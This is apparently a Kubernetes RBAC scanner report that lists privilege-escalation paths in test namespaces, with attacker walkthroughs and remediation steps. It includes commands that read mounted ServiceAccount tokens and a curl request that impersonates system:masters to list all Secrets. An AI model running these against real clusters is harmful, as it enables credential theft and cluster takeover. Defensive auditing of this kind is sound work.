    From ServiceAccount/rbac-ns-fixtures/sa-ns-rolebinding-mutate
    Permission granted create,update,patch rolebindings
    Gives the attacker can create or mutate RoleBindings in namespace rbac-ns-fixtures to grant itself any role within rbac-ns-fixtures
Remediation
Break the chain at the weakest hop and tighten RBAC writes inside rbac-ns-fixtures: remove the create,update,patch rolebindings capability that enables hop 2 (ServiceAccount/rbac-ns-fixtures/sa-ns-rolebinding-mutate).
  1. Confirm the chain with kubectl auth can-i create rolebindings -n rbac-ns-fixtures --as=system:serviceaccount:rbac-fixtures:sa-pod-create (and bind/escalate on roles) — both should return no for any non-admin workload.
  2. Identify the lowest-cost hop to break (typically remove the create,update,patch rolebindings capability that enables hop 2 (ServiceAccount/rbac-ns-fixtures/sa-ns-rolebinding-mutate)); removing one mid-chain hop kills the entire path.
  3. Audit Roles in rbac-ns-fixtures granting RBAC writes: kubectl get role -n rbac-ns-fixtures -o json | jq '.items[] | select(.rules[]? | .resources[]? | contains("rolebindings") or contains("roles"))'. Most workloads should have zero RBAC write rights.
  4. Move RBAC management to GitOps (Argo CD/Flux) so any RoleBinding change requires a PR. The GitOps controller should be the only namespace-local identity with RBAC write access.
  5. Wire admission policy: a Kyverno or OPA Gatekeeper rule that fails any new RoleBinding in rbac-ns-fixtures whose roleRef points at cluster-admin, admin, or any ClusterRole matching *system:* outside an explicit allowlist.
HIGH ServiceAccount/rbac-fixtures/sa-token-create Namespace 7.1
ServiceAccount/rbac-fixtures/sa-token-create can reach namespace-admin in `rbac-ns-fixtures` in 2 hop(s)
Scope · Namespace Source ServiceAccount/rbac-fixtures/sa-token-create → namespace-admin in rbac-ns-fixtures: every workload, Secret, and ConfigMap inside rbac-ns-fixtures becomes attacker-controlled
Category: Privilege Escalation Subject: ServiceAccount/rbac-fixtures/sa-token-create Resource: Namespace/rbac-ns-fixtures/rbac-ns-fixtures

Subject ServiceAccount/rbac-fixtures/sa-token-create has a privesc path that ends at namespace-admin inside rbac-ns-fixtures. The chain leans on a namespace-scoped RBAC primitive — typically create rolebindings (KUBE-PRIVESC-010) or bind/escalate roles (KUBE-PRIVESC-009) granted by a RoleBinding — which lets the subject bind itself (or any subject it controls) to a powerful ClusterRole *within this namespace*. The result is full API control inside rbac-ns-fixtures but, importantly, it does not by itself reach cluster-admin: the binding cannot mutate cluster-scoped resources, and the bound ClusterRole's verbs apply only inside the binding's namespace.

The chain (each step uses an explicit RBAC verb the engine validated against the snapshot):
1. ServiceAccount/rbac-fixtures/sa-token-create → ServiceAccount/rbac-ns-fixtures/sa-ns-rolebinding-mutate via token_request (create serviceaccounts/token): can mint tokens for ServiceAccount rbac-ns-fixtures/sa-ns-rolebinding-mutate
2. ServiceAccount/rbac-ns-fixtures/sa-ns-rolebinding-mutate via modify_role_binding (create,update,patch rolebindings): can create or mutate RoleBindings in namespace rbac-ns-fixtures to grant itself any role within rbac-ns-fixtures

Namespace-admin is a real and frequently underweighted privesc class. In multi-tenant clusters where each tenant lives in its own namespace, namespace-admin == tenant takeover: every other tenant workload running in the same namespace, every Secret stored there, every PVC bound there. It also commonly chains *out* of the namespace — a controller's ServiceAccount inside this namespace may be cluster-scoped, and once the attacker can mint a binding for it locally they can pivot via that SA's cluster-wide reach. Treat namespace-admin findings as one investigation away from cluster-admin, not as "safe because bounded".

Impact Compromise of ServiceAccount/rbac-fixtures/sa-token-create yields full takeover of rbac-ns-fixtures: every Secret/ConfigMap is readable, every pod is exec-able, every workload runs as whatever ServiceAccount the attacker chooses. If any in-namespace ServiceAccount is itself bound cluster-wide (controllers, operators, sidecars with elevated SAs), this also becomes a stepping stone to cluster-admin.
How an attacker abuses this
Background
SubjectServiceAccount

A ServiceAccount is an in-cluster identity assigned to pods. Every pod gets a token mounted at /var/run/secrets/kubernetes.io/serviceaccount/token, and that token is the credential. If an attacker reads that file from inside a compromised container (or creates a pod that mounts the token), they can call the API as the ServiceAccount, with whatever permissions the SA has been granted.

This is the most common pivot in real-world Kubernetes attacks: compromise one pod, steal its token, ride the token to wherever its RBAC allows.

Kubernetes docs ↗
ResourceNamespace

A Namespace divides cluster resources by team, environment, or application. RoleBindings, NetworkPolicies, ResourceQuotas, and most admission rules apply at namespace scope. Compromising one workload in a namespace often gives lateral access to the rest of that namespace's resources.

  1. Attacker compromises any workload or credential bound to ServiceAccount/rbac-fixtures/sa-token-create (RCE, leaked token, malicious image).
  2. Acting as ServiceAccount/rbac-fixtures/sa-token-create, the attacker calls the serviceaccounts/token subresource (create serviceaccounts/token) to mint a fresh, valid token for ServiceAccount/rbac-ns-fixtures/sa-ns-rolebinding-mutate. No pod creation required, and a thinner audit trail than the pod-mount route.
  3. Acting as ServiceAccount/rbac-ns-fixtures/sa-ns-rolebinding-mutate, the attacker abuses RoleBinding write access (create,update,patch rolebindings) to add themselves (or any subject they control) to a high-privilege ClusterRoleBinding, typically cluster-admin. They don't need the target role's permissions today, only the ability to change bindings.
  4. Final step: the attacker holds an identity that can verbs:[*] on resources:[*] inside rbac-ns-fixtures. They read every Secret and ConfigMap in rbac-ns-fixtures, exec into every pod, mount every PersistentVolume, and plant a backdoor RoleBinding (or a privileged DaemonSet on a namespace-scoped tenant operator) for persistence.
  1. Step 1 of 2 TokenRequest minting token_request

    The create verb on serviceaccounts/token mints a fresh, valid token for any ServiceAccount in scope, with no pod required. Cleaner than the pod-creation route and harder to spot in audit logs.

    From ServiceAccount/rbac-fixtures/sa-token-create → ServiceAccount/rbac-ns-fixtures/sa-ns-rolebinding-mutate
    Permission granted create serviceaccounts/token
    Gives the attacker can mint tokens for ServiceAccount rbac-ns-fixtures/sa-ns-rolebinding-mutate
  2. Step 2 of 2 RoleBinding write access modify_role_binding

    create/update/patch on rolebindings or clusterrolebindings lets the attacker bind themselves to any role, typically cluster-admin. They don't need the role's permissions today, only the ability to change bindings.

    Scope matters. Granted at cluster scope (via a ClusterRoleBinding, or with cluster-wide reach on rolebindings) the reach is cluster-admin equivalent. Granted by a RoleBinding the reach is bounded to that one namespace — full namespace-admin, but the bound ClusterRole's verbs apply only inside the binding's namespace.

    From ServiceAccount/rbac-ns-fixtures/sa-ns-rolebinding-mutate
    Permission granted create,update,patch rolebindings
    Gives the attacker can create or mutate RoleBindings in namespace rbac-ns-fixtures to grant itself any role within rbac-ns-fixtures
Remediation
Break the chain at the weakest hop and tighten RBAC writes inside rbac-ns-fixtures: remove the create,update,patch rolebindings capability that enables hop 2 (ServiceAccount/rbac-ns-fixtures/sa-ns-rolebinding-mutate).
  1. Confirm the chain with kubectl auth can-i create rolebindings -n rbac-ns-fixtures --as=system:serviceaccount:rbac-fixtures:sa-token-create (and bind/escalate on roles) — both should return no for any non-admin workload.
  2. Identify the lowest-cost hop to break (typically remove the create,update,patch rolebindings capability that enables hop 2 (ServiceAccount/rbac-ns-fixtures/sa-ns-rolebinding-mutate)); removing one mid-chain hop kills the entire path.
  3. Audit Roles in rbac-ns-fixtures granting RBAC writes: kubectl get role -n rbac-ns-fixtures -o json | jq '.items[] | select(.rules[]? | .resources[]? | contains("rolebindings") or contains("roles"))'. Most workloads should have zero RBAC write rights.
  4. Move RBAC management to GitOps (Argo CD/Flux) so any RoleBinding change requires a PR. The GitOps controller should be the only namespace-local identity with RBAC write access.
  5. Wire admission policy: a Kyverno or OPA Gatekeeper rule that fails any new RoleBinding in rbac-ns-fixtures whose roleRef points at cluster-admin, admin, or any ClusterRole matching *system:* outside an explicit allowlist.
HIGH ServiceAccount/vulnerable/privileged-reader Namespace 7.1
ServiceAccount/vulnerable/privileged-reader can reach namespace-admin in `rbac-ns-fixtures` in 2 hop(s)
Scope · Namespace Source ServiceAccount/vulnerable/privileged-reader → namespace-admin in rbac-ns-fixtures: every workload, Secret, and ConfigMap inside rbac-ns-fixtures becomes attacker-controlled
Category: Privilege Escalation Subject: ServiceAccount/vulnerable/privileged-reader Resource: Namespace/rbac-ns-fixtures/rbac-ns-fixtures

Subject ServiceAccount/vulnerable/privileged-reader has a privesc path that ends at namespace-admin inside rbac-ns-fixtures. The chain leans on a namespace-scoped RBAC primitive — typically create rolebindings (KUBE-PRIVESC-010) or bind/escalate roles (KUBE-PRIVESC-009) granted by a RoleBinding — which lets the subject bind itself (or any subject it controls) to a powerful ClusterRole *within this namespace*. The result is full API control inside rbac-ns-fixtures but, importantly, it does not by itself reach cluster-admin: the binding cannot mutate cluster-scoped resources, and the bound ClusterRole's verbs apply only inside the binding's namespace.

The chain (each step uses an explicit RBAC verb the engine validated against the snapshot):
1. ServiceAccount/vulnerable/privileged-reader → ServiceAccount/rbac-ns-fixtures/sa-ns-rolebinding-mutate via pod_create_token_theft (create pods): can create pods that mount ServiceAccount rbac-ns-fixtures/sa-ns-rolebinding-mutate
2. ServiceAccount/rbac-ns-fixtures/sa-ns-rolebinding-mutate via modify_role_binding (create,update,patch rolebindings): can create or mutate RoleBindings in namespace rbac-ns-fixtures to grant itself any role within rbac-ns-fixtures

Namespace-admin is a real and frequently underweighted privesc class. In multi-tenant clusters where each tenant lives in its own namespace, namespace-admin == tenant takeover: every other tenant workload running in the same namespace, every Secret stored there, every PVC bound there. It also commonly chains *out* of the namespace — a controller's ServiceAccount inside this namespace may be cluster-scoped, and once the attacker can mint a binding for it locally they can pivot via that SA's cluster-wide reach. Treat namespace-admin findings as one investigation away from cluster-admin, not as "safe because bounded".

Impact Compromise of ServiceAccount/vulnerable/privileged-reader yields full takeover of rbac-ns-fixtures: every Secret/ConfigMap is readable, every pod is exec-able, every workload runs as whatever ServiceAccount the attacker chooses. If any in-namespace ServiceAccount is itself bound cluster-wide (controllers, operators, sidecars with elevated SAs), this also becomes a stepping stone to cluster-admin.
How an attacker abuses this
Background
SubjectServiceAccount

A ServiceAccount is an in-cluster identity assigned to pods. Every pod gets a token mounted at /var/run/secrets/kubernetes.io/serviceaccount/token, and that token is the credential. If an attacker reads that file from inside a compromised container (or creates a pod that mounts the token), they can call the API as the ServiceAccount, with whatever permissions the SA has been granted.

This is the most common pivot in real-world Kubernetes attacks: compromise one pod, steal its token, ride the token to wherever its RBAC allows.

Kubernetes docs ↗
ResourceNamespace

A Namespace divides cluster resources by team, environment, or application. RoleBindings, NetworkPolicies, ResourceQuotas, and most admission rules apply at namespace scope. Compromising one workload in a namespace often gives lateral access to the rest of that namespace's resources.

  1. Attacker compromises any workload or credential bound to ServiceAccount/vulnerable/privileged-reader (RCE, leaked token, malicious image).
  2. Acting as ServiceAccount/vulnerable/privileged-reader, the attacker creates a pod that mounts the ServiceAccount/rbac-ns-fixtures/sa-ns-rolebinding-mutate ServiceAccount and then reads /var/run/secrets/kubernetes.io/serviceaccount/token from inside the container. The pod becomes a token-theft primitive: any ServiceAccount the attacker can mount, they can lift.
  3. Acting as ServiceAccount/rbac-ns-fixtures/sa-ns-rolebinding-mutate, the attacker abuses RoleBinding write access (create,update,patch rolebindings) to add themselves (or any subject they control) to a high-privilege ClusterRoleBinding, typically cluster-admin. They don't need the target role's permissions today, only the ability to change bindings.
  4. Final step: the attacker holds an identity that can verbs:[*] on resources:[*] inside rbac-ns-fixtures. They read every Secret and ConfigMap in rbac-ns-fixtures, exec into every pod, mount every PersistentVolume, and plant a backdoor RoleBinding (or a privileged DaemonSet on a namespace-scoped tenant operator) for persistence.
  1. Step 1 of 2 Pod creation → ServiceAccount token theft pod_create_token_theft

    Anyone who can create pods in a namespace can mount any ServiceAccount in that namespace into the pod. Cluster-scoped pod-create lets you mount any ServiceAccount in any namespace. Once the pod is running, the attacker reads /var/run/secrets/kubernetes.io/serviceaccount/token from inside it, and now holds a token for that SA.

    This is the single most common privilege-escalation pattern in production Kubernetes.

    From ServiceAccount/vulnerable/privileged-reader → ServiceAccount/rbac-ns-fixtures/sa-ns-rolebinding-mutate
    Permission granted create pods
    Gives the attacker can create pods that mount ServiceAccount rbac-ns-fixtures/sa-ns-rolebinding-mutate
  2. Step 2 of 2 RoleBinding write access modify_role_binding

    create/update/patch on rolebindings or clusterrolebindings lets the attacker bind themselves to any role, typically cluster-admin. They don't need the role's permissions today, only the ability to change bindings.

    Scope matters. Granted at cluster scope (via a ClusterRoleBinding, or with cluster-wide reach on rolebindings) the reach is cluster-admin equivalent. Granted by a RoleBinding the reach is bounded to that one namespace — full namespace-admin, but the bound ClusterRole's verbs apply only inside the binding's namespace.

    From ServiceAccount/rbac-ns-fixtures/sa-ns-rolebinding-mutate
    Permission granted create,update,patch rolebindings
    Gives the attacker can create or mutate RoleBindings in namespace rbac-ns-fixtures to grant itself any role within rbac-ns-fixtures
Remediation
Break the chain at the weakest hop and tighten RBAC writes inside rbac-ns-fixtures: remove the create,update,patch rolebindings capability that enables hop 2 (ServiceAccount/rbac-ns-fixtures/sa-ns-rolebinding-mutate).
  1. Confirm the chain with kubectl auth can-i create rolebindings -n rbac-ns-fixtures --as=system:serviceaccount:vulnerable:privileged-reader (and bind/escalate on roles) — both should return no for any non-admin workload.
  2. Identify the lowest-cost hop to break (typically remove the create,update,patch rolebindings capability that enables hop 2 (ServiceAccount/rbac-ns-fixtures/sa-ns-rolebinding-mutate)); removing one mid-chain hop kills the entire path.
  3. Audit Roles in rbac-ns-fixtures granting RBAC writes: kubectl get role -n rbac-ns-fixtures -o json | jq '.items[] | select(.rules[]? | .resources[]? | contains("rolebindings") or contains("roles"))'. Most workloads should have zero RBAC write rights.
  4. Move RBAC management to GitOps (Argo CD/Flux) so any RoleBinding change requires a PR. The GitOps controller should be the only namespace-local identity with RBAC write access.
  5. Wire admission policy: a Kyverno or OPA Gatekeeper rule that fails any new RoleBinding in rbac-ns-fixtures whose roleRef points at cluster-admin, admin, or any ClusterRole matching *system:* outside an explicit allowlist.
HIGH

Subjects can reach token_mint in 1 hop(s)

KUBE-PRIVESC-PATH-GENERIC 3 subjects Score 7.0–6.5
MITRE ATT&CK: T1078.004 · T1098 · T1068

Affected subjects (3)

HIGH ServiceAccount/rbac-fixtures/sa-token-create Cluster 7.0
ServiceAccount/rbac-fixtures/sa-token-create can reach token_mint in 1 hop(s)
Scope · Cluster Source ServiceAccount/rbac-fixtures/sa-token-create → token_mint
Category: Privilege Escalation Subject: ServiceAccount/rbac-fixtures/sa-token-create

Subject ServiceAccount/rbac-fixtures/sa-token-create has a chain to token_mint. Each hop in the chain is an RBAC primitive the engine validated against the snapshot.

The chain:
1. ServiceAccount/rbac-fixtures/sa-token-create via mint_arbitrary_token (create serviceaccounts/token (cluster-wide)): can mint a service-account token for any ServiceAccount in any namespace

Impact Compromise of ServiceAccount/rbac-fixtures/sa-token-create chains to token_mint. Investigate the specific privileges this sink represents in your cluster.
How an attacker abuses this
Background
SubjectServiceAccount

A ServiceAccount is an in-cluster identity assigned to pods. Every pod gets a token mounted at /var/run/secrets/kubernetes.io/serviceaccount/token, and that token is the credential. If an attacker reads that file from inside a compromised container (or creates a pod that mounts the token), they can call the API as the ServiceAccount, with whatever permissions the SA has been granted.

This is the most common pivot in real-world Kubernetes attacks: compromise one pod, steal its token, ride the token to wherever its RBAC allows.

Kubernetes docs ↗
  1. Attacker compromises any workload bound to ServiceAccount/rbac-fixtures/sa-token-create.
  2. Acting as ServiceAccount/rbac-fixtures/sa-token-create, the attacker calls serviceaccounts/token at cluster scope (create serviceaccounts/token (cluster-wide)) to mint a token for any ServiceAccount in any namespace. With no resourceNames constraint, the verb amounts to a credential-issuing oracle.
  3. Final step: attacker reaches token_mint.
  1. Mint a token for any ServiceAccount mint_arbitrary_token

    The create verb on serviceaccounts/token at cluster scope (without resourceNames) lets the holder mint a fresh, valid token for any ServiceAccount in any namespace. No pod creation or exec needed, and it leaves a thinner audit trail than the pod-mount route.

    From ServiceAccount/rbac-fixtures/sa-token-create
    Permission granted create serviceaccounts/token (cluster-wide)
    Gives the attacker can mint a service-account token for any ServiceAccount in any namespace
Remediation
Break the chain at the weakest hop: remove the permission create serviceaccounts/token (cluster-wide) that enables the first hop (ServiceAccount/rbac-fixtures/sa-token-create).
  1. Confirm each hop with kubectl auth can-i.
  2. Apply the cut: remove the permission create serviceaccounts/token (cluster-wide) that enables the first hop (ServiceAccount/rbac-fixtures/sa-token-create).
  3. Re-run the scanner to confirm the path no longer resolves.
HIGH ServiceAccount/rbac-fixtures/sa-pod-create Cluster 6.5
ServiceAccount/rbac-fixtures/sa-pod-create can reach token_mint in 2 hop(s)
Scope · Cluster Source ServiceAccount/rbac-fixtures/sa-pod-create → token_mint
Category: Privilege Escalation Subject: ServiceAccount/rbac-fixtures/sa-pod-create

Subject ServiceAccount/rbac-fixtures/sa-pod-create has a multi-hop chain to token_mint. Each hop in the chain is an RBAC primitive the engine validated against the snapshot.

The chain:
1. ServiceAccount/rbac-fixtures/sa-pod-create → ServiceAccount/rbac-fixtures/sa-token-create via pod_create_token_theft (create pods): can create pods that mount ServiceAccount rbac-fixtures/sa-token-create
2. ServiceAccount/rbac-fixtures/sa-token-create via mint_arbitrary_token (create serviceaccounts/token (cluster-wide)): can mint a service-account token for any ServiceAccount in any namespace

Impact Compromise of ServiceAccount/rbac-fixtures/sa-pod-create chains to token_mint. Investigate the specific privileges this sink represents in your cluster.
How an attacker abuses this
Background
SubjectServiceAccount

A ServiceAccount is an in-cluster identity assigned to pods. Every pod gets a token mounted at /var/run/secrets/kubernetes.io/serviceaccount/token, and that token is the credential. If an attacker reads that file from inside a compromised container (or creates a pod that mounts the token), they can call the API as the ServiceAccount, with whatever permissions the SA has been granted.

This is the most common pivot in real-world Kubernetes attacks: compromise one pod, steal its token, ride the token to wherever its RBAC allows.

Kubernetes docs ↗
  1. Attacker compromises any workload bound to ServiceAccount/rbac-fixtures/sa-pod-create.
  2. Acting as ServiceAccount/rbac-fixtures/sa-pod-create, the attacker creates a pod that mounts the ServiceAccount/rbac-fixtures/sa-token-create ServiceAccount and then reads /var/run/secrets/kubernetes.io/serviceaccount/token from inside the container. The pod becomes a token-theft primitive: any ServiceAccount the attacker can mount, they can lift.
  3. Acting as ServiceAccount/rbac-fixtures/sa-token-create, the attacker calls serviceaccounts/token at cluster scope (create serviceaccounts/token (cluster-wide)) to mint a token for any ServiceAccount in any namespace. With no resourceNames constraint, the verb amounts to a credential-issuing oracle.
  4. Final step: attacker reaches token_mint.
  1. Step 1 of 2 Pod creation → ServiceAccount token theft pod_create_token_theft

    Anyone who can create pods in a namespace can mount any ServiceAccount in that namespace into the pod. Cluster-scoped pod-create lets you mount any ServiceAccount in any namespace. Once the pod is running, the attacker reads /var/run/secrets/kubernetes.io/serviceaccount/token from inside it, and now holds a token for that SA.

    This is the single most common privilege-escalation pattern in production Kubernetes.

    From ServiceAccount/rbac-fixtures/sa-pod-create → ServiceAccount/rbac-fixtures/sa-token-create
    Permission granted create pods
    Gives the attacker can create pods that mount ServiceAccount rbac-fixtures/sa-token-create
  2. Step 2 of 2 Mint a token for any ServiceAccount mint_arbitrary_token

    The create verb on serviceaccounts/token at cluster scope (without resourceNames) lets the holder mint a fresh, valid token for any ServiceAccount in any namespace. No pod creation or exec needed, and it leaves a thinner audit trail than the pod-mount route.

    From ServiceAccount/rbac-fixtures/sa-token-create
    Permission granted create serviceaccounts/token (cluster-wide)
    Gives the attacker can mint a service-account token for any ServiceAccount in any namespace
Remediation
Break the chain at the weakest hop: remove the create pods capability that enables hop 1 (ServiceAccount/rbac-fixtures/sa-pod-create → ServiceAccount/rbac-fixtures/sa-token-create).
  1. Confirm each hop with kubectl auth can-i.
  2. Apply the cut: remove the create pods capability that enables hop 1 (ServiceAccount/rbac-fixtures/sa-pod-create → ServiceAccount/rbac-fixtures/sa-token-create).
  3. Re-run the scanner to confirm the path no longer resolves.
HIGH ServiceAccount/vulnerable/privileged-reader Cluster 6.5
ServiceAccount/vulnerable/privileged-reader can reach token_mint in 2 hop(s)
Scope · Cluster Source ServiceAccount/vulnerable/privileged-reader → token_mint
Category: Privilege Escalation Subject: ServiceAccount/vulnerable/privileged-reader

Subject ServiceAccount/vulnerable/privileged-reader has a multi-hop chain to token_mint. Each hop in the chain is an RBAC primitive the engine validated against the snapshot.

The chain:
1. ServiceAccount/vulnerable/privileged-reader → ServiceAccount/rbac-fixtures/sa-token-create via pod_create_token_theft (create pods): can create pods that mount ServiceAccount rbac-fixtures/sa-token-create
2. ServiceAccount/rbac-fixtures/sa-token-create via mint_arbitrary_token (create serviceaccounts/token (cluster-wide)): can mint a service-account token for any ServiceAccount in any namespace

Impact Compromise of ServiceAccount/vulnerable/privileged-reader chains to token_mint. Investigate the specific privileges this sink represents in your cluster.
How an attacker abuses this
Background
SubjectServiceAccount

A ServiceAccount is an in-cluster identity assigned to pods. Every pod gets a token mounted at /var/run/secrets/kubernetes.io/serviceaccount/token, and that token is the credential. If an attacker reads that file from inside a compromised container (or creates a pod that mounts the token), they can call the API as the ServiceAccount, with whatever permissions the SA has been granted.

This is the most common pivot in real-world Kubernetes attacks: compromise one pod, steal its token, ride the token to wherever its RBAC allows.

Kubernetes docs ↗
  1. Attacker compromises any workload bound to ServiceAccount/vulnerable/privileged-reader.
  2. Acting as ServiceAccount/vulnerable/privileged-reader, the attacker creates a pod that mounts the ServiceAccount/rbac-fixtures/sa-token-create ServiceAccount and then reads /var/run/secrets/kubernetes.io/serviceaccount/token from inside the container. The pod becomes a token-theft primitive: any ServiceAccount the attacker can mount, they can lift.
  3. Acting as ServiceAccount/rbac-fixtures/sa-token-create, the attacker calls serviceaccounts/token at cluster scope (create serviceaccounts/token (cluster-wide)) to mint a token for any ServiceAccount in any namespace. With no resourceNames constraint, the verb amounts to a credential-issuing oracle.
  4. Final step: attacker reaches token_mint.
  1. Step 1 of 2 Pod creation → ServiceAccount token theft pod_create_token_theft

    Anyone who can create pods in a namespace can mount any ServiceAccount in that namespace into the pod. Cluster-scoped pod-create lets you mount any ServiceAccount in any namespace. Once the pod is running, the attacker reads /var/run/secrets/kubernetes.io/serviceaccount/token from inside it, and now holds a token for that SA.

    This is the single most common privilege-escalation pattern in production Kubernetes.

    From ServiceAccount/vulnerable/privileged-reader → ServiceAccount/rbac-fixtures/sa-token-create
    Permission granted create pods
    Gives the attacker can create pods that mount ServiceAccount rbac-fixtures/sa-token-create
  2. Step 2 of 2 Mint a token for any ServiceAccount mint_arbitrary_token

    The create verb on serviceaccounts/token at cluster scope (without resourceNames) lets the holder mint a fresh, valid token for any ServiceAccount in any namespace. No pod creation or exec needed, and it leaves a thinner audit trail than the pod-mount route.

    From ServiceAccount/rbac-fixtures/sa-token-create
    Permission granted create serviceaccounts/token (cluster-wide)
    Gives the attacker can mint a service-account token for any ServiceAccount in any namespace
Remediation
Break the chain at the weakest hop: remove the create pods capability that enables hop 1 (ServiceAccount/vulnerable/privileged-reader → ServiceAccount/rbac-fixtures/sa-token-create).
  1. Confirm each hop with kubectl auth can-i.
  2. Apply the cut: remove the create pods capability that enables hop 1 (ServiceAccount/vulnerable/privileged-reader → ServiceAccount/rbac-fixtures/sa-token-create).
  3. Re-run the scanner to confirm the path no longer resolves.

RBAC

14 findings · 10 rules · 8 critical · 6 high · 0 medium · 0 low
CRITICAL

Cluster-wide impersonate permission on ServiceAccount/rbac-fixtures/sa-impersonate

KUBE-PRIVESC-008 1 subject Score 10.0
MITRE ATT&CK: T1078 · T1078.004 · T1550 · T1134

Affected subject

CRITICAL ServiceAccount/rbac-fixtures/sa-impersonate Cluster 10.0
Cluster-wide impersonate permission on ServiceAccount/rbac-fixtures/sa-impersonate
Scope · Cluster Cluster-wide: applies to every current and future namespace
Category: Privilege Escalation Subject: ServiceAccount/rbac-fixtures/sa-impersonate Resource: RBACRule/cr-impersonate

Subject ServiceAccount/rbac-fixtures/sa-impersonate has the impersonate verb on users/groups/serviceaccounts via ClusterRoleBinding crb-impersonate → ClusterRole cr-impersonate. Cluster-wide: applies to every current and future namespace.

Kubernetes' impersonation lets a request set Impersonate-User/Impersonate-Group headers (or kubectl --as) so the API server processes the request as a different identity. The Kubernetes project flags this in RBAC Good Practices as one of three verbs (alongside bind and escalate) that override normal RBAC limits.

Most damaging is the ability to impersonate the system:masters group, which is hardcoded inside kube-apiserver to bypass RBAC entirely. There is no Role or RoleBinding that grants system:masters membership; the apiserver simply trusts the assertion. kubectl --as=admin --as-group=system:masters get secrets -A runs as cluster-admin, full stop. Impersonation is also stealthier than a binding change because audit logs show user.username as the original subject.
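
The same bypass expressed as a raw API request, to show where the impersonation headers sit (kubectl --as/--as-group simply sets them); this sketch assumes the caller runs inside a pod bound to the offending ServiceAccount:

TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
APISERVER=https://${KUBERNETES_SERVICE_HOST}:${KUBERNETES_SERVICE_PORT}

# The caller authenticates as itself but asserts a different identity via headers;
# the API server then authorizes the request as system:masters.
curl --cacert /var/run/secrets/kubernetes.io/serviceaccount/ca.crt \
  -H "Authorization: Bearer $TOKEN" \
  -H "Impersonate-User: admin" \
  -H "Impersonate-Group: system:masters" \
  "$APISERVER/api/v1/secrets"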

Impact Act as any user/group/ServiceAccount cluster-wide; impersonating system:masters bypasses all RBAC checks entirely.
How an attacker abuses this
Background
SubjectServiceAccount

A ServiceAccount is an in-cluster identity assigned to pods. Every pod gets a token mounted at /var/run/secrets/kubernetes.io/serviceaccount/token, and that token is the credential. If an attacker reads that file from inside a compromised container (or creates a pod that mounts the token), they can call the API as the ServiceAccount, with whatever permissions the SA has been granted.

This is the most common pivot in real-world Kubernetes attacks: compromise one pod, steal its token, ride the token to wherever its RBAC allows.

Kubernetes docs ↗
TechniqueRBAC impersonation

Kubernetes has a built-in "act as another user" feature: the impersonate verb on users, groups, or serviceaccounts. Anyone with that verb can submit requests as any identity, bypassing whatever permissions they don't have themselves.

Granting impersonate on groups = ["*"] is equivalent to cluster-admin: the holder can impersonate system:masters.

  1. Attacker confirms the verb with kubectl auth can-i impersonate users --as=sa-impersonate -A.
  2. They run kubectl --as=admin --as-group=system:masters get clusterrolebindings to confirm system:masters impersonation succeeds.
  3. They impersonate the highest-privileged ServiceAccount they can find (e.g. system:serviceaccount:kube-system:clusterrole-aggregation-controller) and exfiltrate Secrets cluster-wide.
  4. They establish persistence by creating a benign-looking ClusterRoleBinding via the impersonated identity (to most reviewers the change appears to come from the impersonated identity; only audit entries that capture the impersonation headers tie it back to the attacker).
  5. They optionally add their own user to a privileged group via OIDC group claims, providing identity-layer persistence that survives RBAC remediation.
Remediation
Remove impersonate entirely; if a SaaS console truly needs it, gate on resourceNames and never grant it on groups.
  1. Remove impersonate on users, groups, and serviceaccounts. The vast majority of workloads have no need for impersonation.
  2. If impersonation is genuinely required, scope to users only (not groups, and never allow system:masters), use resourceNames to allow only specific identities (see the sketch after these steps), and never grant cluster-wide.
  3. Enable Impersonate-* audit policy at Metadata level minimum so every impersonated request is logged with the original caller. SIEM-alert on impersonation of any system: user or group.
  4. Verify with kubectl auth can-i impersonate '*' --as=sa-impersonate -A returning no.
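A minimal sketch of the narrowly scoped grant described in step 2, assuming a console component that only ever needs to act as two named low-privilege users; the role name and user names are hypothetical:

apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  name: console-impersonate-scoped   # hypothetical
rules:
- apiGroups: [""]
  resources: ["users"]
  verbs: ["impersonate"]
  # Only these named identities can be impersonated; no groups, no serviceaccounts.
  resourceNames: ["viewer@example.com", "support@example.com"]

Because groups are excluded entirely, system:masters can never be asserted through this role.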
Evidence
Scope: Cluster
API groups: core/v1
Resources: groups
Verbs: impersonate
impersonate: Act as any user, group, or ServiceAccount
Source role: cr-impersonate
Inspect: kubectl get clusterrole cr-impersonate -o yaml
Source binding: crb-impersonate
Inspect: kubectl get clusterrolebinding crb-impersonate -o yaml
Show raw JSON
{
  "api_groups": [
    ""
  ],
  "namespace": "",
  "resources": [
    "groups"
  ],
  "scope": "cluster",
  "source_binding": "crb-impersonate",
  "source_role": "cr-impersonate",
  "verbs": [
    "impersonate"
  ]
}
CRITICAL

Cluster-wide bind/escalate on roles bypasses RBAC

KUBE-PRIVESC-009 1 subject Score 10.0
MITRE ATT&CK: T1098 · T1078.004 · T1548

Affected subject

CRITICAL ServiceAccount/rbac-fixtures/sa-bind-escalate Cluster 10.0
Cluster-wide bind/escalate on roles bypasses RBAC (ServiceAccount/rbac-fixtures/sa-bind-escalate)
Scope · Cluster Cluster-wide: applies to every current and future namespace
Category: Privilege Escalation Subject: ServiceAccount/rbac-fixtures/sa-bind-escalate Resource: RBACRule/cr-bind-escalate

Subject ServiceAccount/rbac-fixtures/sa-bind-escalate has the bind or escalate verb on roles/clusterroles via ClusterRoleBinding crb-bind-escalate → ClusterRole cr-bind-escalate. Cluster-wide: applies to every current and future namespace.

Kubernetes' RBAC normally enforces a privilege-escalation guard: you cannot create a Role/RoleBinding granting permissions you do not already hold. The escalate and bind verbs are explicit, documented exceptions to that guard.

escalate lets the subject author or modify a Role/ClusterRole with verbs and resources they don't currently possess. In practice, they rewrite an existing Role they're already bound to and instantly inherit whatever they wrote into it.

bind lets the subject create a RoleBinding/ClusterRoleBinding referencing a (Cluster)Role they don't already hold. With bind on clusterroles, an attacker creates a ClusterRoleBinding from themselves to cluster-admin and is done in one step.

Impact: Defeat the API-level escalation guard cluster-wide; the subject can grant itself any (Cluster)Role's permissions, including cluster-admin.
How an attacker abuses this
Background
Subject · ServiceAccount

A ServiceAccount is an in-cluster identity assigned to pods. Every pod gets a token mounted at /var/run/secrets/kubernetes.io/serviceaccount/token, and that token is the credential. If an attacker reads that file from inside a compromised container (or creates a pod that mounts the token), they can call the API as the ServiceAccount, with whatever permissions the SA has been granted.

This is the most common pivot in real-world Kubernetes attacks: compromise one pod, steal its token, ride the token to wherever its RBAC allows.

Kubernetes docs ↗
Technique · RBAC bind/escalate bypass

